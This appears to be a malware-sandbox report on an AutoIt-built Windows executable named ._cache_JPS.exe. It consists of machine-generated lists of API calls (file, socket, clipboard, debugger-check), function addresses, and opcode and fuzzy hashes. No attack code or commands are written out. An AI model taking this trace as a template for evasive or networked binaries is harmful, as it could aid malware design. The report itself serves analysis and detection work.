                                                                                                                                                          • Part of subcall function 00A916F2: RegisterClipboardFormatW.USER32(WM_GETCONTROLNAME), ref: 00A91751
                                                                                                                                                        • GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A9159B
                                                                                                                                                        • CoInitialize.OLE32(00000000), ref: 00A91612
                                                                                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B058F7
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Handle$ClipboardCloseFormatInitializeRegister
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 458326420-0
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID: EA06
                                                                                                                                                        • API String ID: 4104443479-3962188686
                                                                                                                                                        APIs
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _wcscmp
                                                                                                                                                        • String ID: 0.0.0.0
                                                                                                                                                        • API String ID: 856254489-3771769585
                                                                                                                                                        • Opcode ID: b415e311c88699fceed4077710ad7dfa1963519925cd1413ba53c7294d3312c0
                                                                                                                                                        • Instruction ID: 5573a757add16c8aacc32b1300372ff9cd12aacf17eea6fa2bba1b700dc43c7b
                                                                                                                                                        • Opcode Fuzzy Hash: b415e311c88699fceed4077710ad7dfa1963519925cd1413ba53c7294d3312c0
                                                                                                                                                        • Instruction Fuzzy Hash: 9511C635704214DFCB04EF55DA91E99B3F9AF85710B148099F509AF395DAB0EDC1CBA0
                                                                                                                                                        APIs
                                                                                                                                                        • _memset.LIBCMT ref: 00B03CF1
                                                                                                                                                          • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                                                                                                                                                          • Part of subcall function 00A93A67: SHGetMalloc.SHELL32(00A93C31), ref: 00A93A7D
                                                                                                                                                          • Part of subcall function 00A93A67: SHGetDesktopFolder.SHELL32(?), ref: 00A93A8F
                                                                                                                                                          • Part of subcall function 00A93A67: SHGetPathFromIDListW.SHELL32(?,?), ref: 00A93AD2
                                                                                                                                                          • Part of subcall function 00A93B45: GetFullPathNameW.KERNEL32(?,00000104,?,?,00B522E8,?), ref: 00A93B65
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Path$FullName$DesktopFolderFromListMalloc_memset
                                                                                                                                                        • String ID: X
                                                                                                                                                        • API String ID: 2727075218-3081909835
                                                                                                                                                        • Opcode ID: 4412d034248aef9b94ca105443001e800aee0e65ff8c8133d2f7a9e9259b5981
                                                                                                                                                        • Instruction ID: 693661f1d89a1a1c8781f46895d9f9dd7665cf435872023608b58773a167c498
                                                                                                                                                        • Opcode Fuzzy Hash: 4412d034248aef9b94ca105443001e800aee0e65ff8c8133d2f7a9e9259b5981
                                                                                                                                                        • Instruction Fuzzy Hash: 6611CA72B00288ABCF05DFD8D8096DEBBFDAF45704F04800AE401BB281CBB55B498BA5
                                                                                                                                                        Strings
                                                                                                                                                        • >>>AUTOIT NO CMDEXECUTE<<<, xrefs: 00B034AA
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID: >>>AUTOIT NO CMDEXECUTE<<<
                                                                                                                                                        • API String ID: 1029625771-2684727018
                                                                                                                                                        • Opcode ID: 4d0f4ced452bc66f85dcab8f42ed5908212dae26d5b5c11fc5901f546e44c761
                                                                                                                                                        • Instruction ID: d2acea4acb70ccea95eb2ee28fadd910ee2f8c3b91aa86220c10fd33370dd6a7
                                                                                                                                                        • Opcode Fuzzy Hash: 4d0f4ced452bc66f85dcab8f42ed5908212dae26d5b5c11fc5901f546e44c761
                                                                                                                                                        • Instruction Fuzzy Hash: 80F06872A0020DAECF11EFB0D9519FFB7FCAE10310F548566E81692192EB349B09CB21
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 2cd6c9d27234ee81d27eb122f5750c87ac17bc6f79916e910f5c586615219d05
                                                                                                                                                        • Instruction ID: 3e9062830c162b861b87959b76b8b60bb60eb3424e77f9f67cbebd6810e3a89d
                                                                                                                                                        • Opcode Fuzzy Hash: 2cd6c9d27234ee81d27eb122f5750c87ac17bc6f79916e910f5c586615219d05
                                                                                                                                                        • Instruction Fuzzy Hash: C55181316043029FCB18EF68D591BAA77E5EF89320F14856DF99A8B2D2DB30E845CB51
                                                                                                                                                        APIs
                                                                                                                                                        • GetCursorPos.USER32(?), ref: 00AE8074
                                                                                                                                                        • GetForegroundWindow.USER32 ref: 00AE807A
                                                                                                                                                          • Part of subcall function 00AE6B19: GetWindowRect.USER32(?,?), ref: 00AE6B2C
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$CursorForegroundRect
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1066937146-0
                                                                                                                                                        • Opcode ID: 81d45fd201c876bd1ddbe0e77c067953cb87cee2955cef72557a229ad0362099
                                                                                                                                                        • Instruction ID: 02c9c2dbc7467b50019a5b853daf275acc6963f497d25e789a7a45da2a8b0f56
                                                                                                                                                        • Opcode Fuzzy Hash: 81d45fd201c876bd1ddbe0e77c067953cb87cee2955cef72557a229ad0362099
                                                                                                                                                        • Instruction Fuzzy Hash: 6A314F75A00209AFDF00EFA5CD81BEEB7B8FF14314F10452AE956A7251DB38AE55CB90
                                                                                                                                                        APIs
                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00B0DB31
                                                                                                                                                        • IsWindow.USER32(00000000), ref: 00B0DB6B
                                                                                                                                                          • Part of subcall function 00A91F04: GetForegroundWindow.USER32 ref: 00A91FBE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Window$Foreground
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9193B: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00A91952
                                                                                                                                                        • SendMessageW.USER32(?,0000000D,00000001,00000000), ref: 00ACE344
                                                                                                                                                        • _strlen.LIBCMT ref: 00ACE34F
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessageSend$Timeout_strlen
                                                                                                                                                        APIs
                                                                                                                                                        • 74C3C8D0.UXTHEME ref: 00A936E6
                                                                                                                                                          • Part of subcall function 00AB2025: __lock.LIBCMT ref: 00AB202B
                                                                                                                                                          • Part of subcall function 00A932DE: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 00A932F6
                                                                                                                                                          • Part of subcall function 00A932DE: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 00A9330B
                                                                                                                                                          • Part of subcall function 00A9374E: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,00000001), ref: 00A9376D
                                                                                                                                                          • Part of subcall function 00A9374E: IsDebuggerPresent.KERNEL32(?,?), ref: 00A9377F
                                                                                                                                                          • Part of subcall function 00A9374E: GetFullPathNameW.KERNEL32(C:\Users\user\Desktop\._cache_JPS.exe,00000104,?,00B51120,C:\Users\user\Desktop\._cache_JPS.exe,00B51124,?,?), ref: 00A937EE
                                                                                                                                                          • Part of subcall function 00A9374E: SetCurrentDirectoryW.KERNEL32(?), ref: 00A93860
                                                                                                                                                        • SystemParametersInfoW.USER32(00002001,00000000,?,00000002), ref: 00A93726
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: InfoParametersSystem$CurrentDirectory$DebuggerFullNamePathPresent__lock
                                                                                                                                                        APIs
                                                                                                                                                        • CreateFileW.KERNEL32(?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000001,?,00A94C2B,?,?,?,?,00A9BE63), ref: 00A94BB6
                                                                                                                                                        • CreateFileW.KERNEL32(?,C0000000,00000007,00000000,00000004,00000080,00000000,?,00000001,?,00A94C2B,?,?,?,?,00A9BE63), ref: 00B04972
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: CreateFile
                                                                                                                                                        APIs
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF282
                                                                                                                                                        • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,?,00000000,00000000,00000000,00000000,?,?,00ADAEA5,?,?,00000000,00000008), ref: 00AAF2A6
                                                                                                                                                          • Part of subcall function 00AAF2D0: _memmove.LIBCMT ref: 00AAF307
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ByteCharMultiWide$_memmove
                                                                                                                                                        APIs
                                                                                                                                                        • ___lock_fhandle.LIBCMT ref: 00ABF7D9
                                                                                                                                                        • __close_nolock.LIBCMT ref: 00ABF7F2
                                                                                                                                                          • Part of subcall function 00AB886A: __getptd_noexit.LIBCMT ref: 00AB886A
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __getptd_noexit$___lock_fhandle__close_nolock
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1046115767-0
                                                                                                                                                        APIs
                                                                                                                                                        • send.WS2_32(00000000,?,00000000,00000000), ref: 00AE9534
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000,?,00000000,00000000), ref: 00AE9557
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastsend
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1802528911-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AB889E: __getptd_noexit.LIBCMT ref: 00AB889E
                                                                                                                                                        • __lock_file.LIBCMT ref: 00AB42B9
                                                                                                                                                          • Part of subcall function 00AB5A9F: __lock.LIBCMT ref: 00AB5AC2
                                                                                                                                                        • __fclose_nolock.LIBCMT ref: 00AB42C4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __fclose_nolock__getptd_noexit__lock__lock_file
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2800547568-0
                                                                                                                                                        APIs
                                                                                                                                                        • timeGetTime.WINMM ref: 00AAF57A
                                                                                                                                                          • Part of subcall function 00A9E1F0: PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A9E279
                                                                                                                                                        • Sleep.KERNEL32(00000000), ref: 00B075D3
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: MessagePeekSleepTimetime
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1792118007-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A984A6: __swprintf.LIBCMT ref: 00A984E5
                                                                                                                                                          • Part of subcall function 00A984A6: __itow.LIBCMT ref: 00A98519
                                                                                                                                                        • __wcsnicmp.LIBCMT ref: 00A983C4
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: __itow__swprintf__wcsnicmp
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 712828618-0
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID:
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID:
                                                                                                                                                        • Opcode ID: 784817614da0cd8cc0a830e556810c613da0cc6435538ba30c77bb68efe60aa0
                                                                                                                                                        • Instruction ID: 4e4011fab74a96f2bf4af3aba1ac75457eee6f0d55706d0c37fc8b5fa17d076f
                                                                                                                                                        • Opcode Fuzzy Hash: 784817614da0cd8cc0a830e556810c613da0cc6435538ba30c77bb68efe60aa0
                                                                                                                                                        • Instruction Fuzzy Hash: 78517335700214AFCF18EBA8CA91EAD7BEAAF49310B144199F9069B3D2DB31ED45D750
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                                        • Instruction ID: 0c76a4ff97252e46c07682dd4f715a70f0ab3722454e3893d4a2eb01d9bb5a83
                                                                                                                                                        • Opcode Fuzzy Hash: 653a53b8435a0736043d6b22074b13ebbbade5d52c540747a625e5d2bf85aa42
                                                                                                                                                        • Instruction Fuzzy Hash: 4D41CE79201602CFCB24DF59E580962F7F4FF88360714C66EE99A8B761EB30E851CB20
                                                                                                                                                        APIs
                                                                                                                                                        • SetFilePointerEx.KERNEL32(?,?,00000001,00000000,00000000,?,?,00000000), ref: 00A94F8F
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FilePointer
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 973152223-0
                                                                                                                                                        • Opcode ID: 5cbfb3e2f855af56b852894e0cab8aa8521f162dd3468d4c910bc6f8f043394a
                                                                                                                                                        • Instruction ID: 6efc341883f65becc74ad7cdb5ec811b949069ed9d1c8e18a946b2f486597f44
                                                                                                                                                        • Opcode Fuzzy Hash: 5cbfb3e2f855af56b852894e0cab8aa8521f162dd3468d4c910bc6f8f043394a
                                                                                                                                                        • Instruction Fuzzy Hash: 65314671B0061AAFCF08CF6DC580AADB7F5BF88710F14862AE81997750D770B9A1CB90
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: select
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1274211008-0
                                                                                                                                                        • Opcode ID: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                        • Instruction ID: a9b5a818cbf73ec010a63d7029733e49233c0247e94bc461045fff11e23793c4
                                                                                                                                                        • Opcode Fuzzy Hash: 160be14eaa7db79452b6aeb530136e2f2731e3e0b6e758b09a27e7bca35b483d
                                                                                                                                                        • Instruction Fuzzy Hash: CB31C670A00106AFD758DF98D480A6AFBB5FF4A350B2486A5E449CB295D731EDC1CBD0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                        • Opcode ID: 885facb11628f535c2d8236fae580fbebe3450be5e8ab95c1773e844ec717001
                                                                                                                                                        • Instruction ID: 4eb42c4d736f983232443b34ba67c180eb3c4bfe637ab338b3920f6e70768370
                                                                                                                                                        • Opcode Fuzzy Hash: 885facb11628f535c2d8236fae580fbebe3450be5e8ab95c1773e844ec717001
                                                                                                                                                        • Instruction Fuzzy Hash: CE411B745046518FEB24CF18C584F1ABBE1BF49318F19899CE99A4B3A2C372E885CF52
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: b82e88169727a85e702686efe194600aad7e0a55db005200254e0eebdecbc88b
                                                                                                                                                        • Instruction ID: d7191ee442c702c9c7083a336bd2d73fd6289aa98321d834ef15ff812ca08d37
                                                                                                                                                        • Opcode Fuzzy Hash: b82e88169727a85e702686efe194600aad7e0a55db005200254e0eebdecbc88b
                                                                                                                                                        • Instruction Fuzzy Hash: 6B2124B0A00608EBCF149F15E880A6E7FF8FB57340F2189ADE586C6050EB309AD0D715
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A93F5D: FreeLibrary.KERNEL32(00000000,?), ref: 00A93F90
                                                                                                                                                        • LoadLibraryExW.KERNEL32(00000001,00000000,00000002,?,?,?,?,00A934E2,?,00000001), ref: 00A93FCD
                                                                                                                                                          • Part of subcall function 00A93E78: FreeLibrary.KERNEL32(00000000), ref: 00A93EAB
                                                                                                                                                          • Part of subcall function 00A94010: _memmove.LIBCMT ref: 00A9405A
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Library$Free$Load_memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 3640140200-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ClearVariant
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1473721057-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: LibraryLoad
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1029625771-0
                                                                                                                                                        APIs
                                                                                                                                                        • ReadFile.KERNEL32(?,?,00010000,?,00000000,?,00000000,00000000,?,00A94E69,00000000,00010000,00000000,00000000,00000000,00000000), ref: 00A94CF7
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: FileRead
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2738559852-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                                                        • Instruction ID: 17d11132126ccda550fc9d71aea21425e221c6f7cdd495fdea4bd2fd37790e21
                                                                                                                                                        • Opcode Fuzzy Hash: b5c2f79ffc866aa4d9d8d5862c779d30c68016984ecab95dea654ca3aae33fc1
                                                                                                                                                        • Instruction Fuzzy Hash: 34018672210B016ED7149B79D807A66BBE8DF487A0F50852AF95ACB1D1EB71E4008A90
                                                                                                                                                        APIs
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                                        • Instruction ID: 0d5c39b746d55af5358733418df91fb2da73aec43fb47cbd0eddba9a07224254
                                                                                                                                                        • Opcode Fuzzy Hash: 02776e319c847e67457d139bf32e2937006cb129a4eaf7d285538e405d1422c3
                                                                                                                                                        • Instruction Fuzzy Hash: 9301DB71104601EFCF286FA8D941E5BBBE8DF83360B10463EF8684B291D731985587B1
                                                                                                                                                        APIs
                                                                                                                                                        • WSAStartup.WS2_32(00000202,?), ref: 00AE95C9
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Startup
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 724789610-0
                                                                                                                                                        • Opcode ID: 17ed20bd6fc57a7d0d68e7a7b69c7a6bd3953fda7bc7bf150382354010e3fcd1
                                                                                                                                                        • Instruction ID: fffa3baccfdcf8242e587fbc504d3736e0cf72e5913ca2ffd272d8cdc2ed9428
                                                                                                                                                        • Opcode Fuzzy Hash: 17ed20bd6fc57a7d0d68e7a7b69c7a6bd3953fda7bc7bf150382354010e3fcd1
                                                                                                                                                        • Instruction Fuzzy Hash: 56E0E5372042146BC310EA64DC05AABB799BF85720F04875ABDA48B2C1DB30DC14C3D1
                                                                                                                                                        APIs
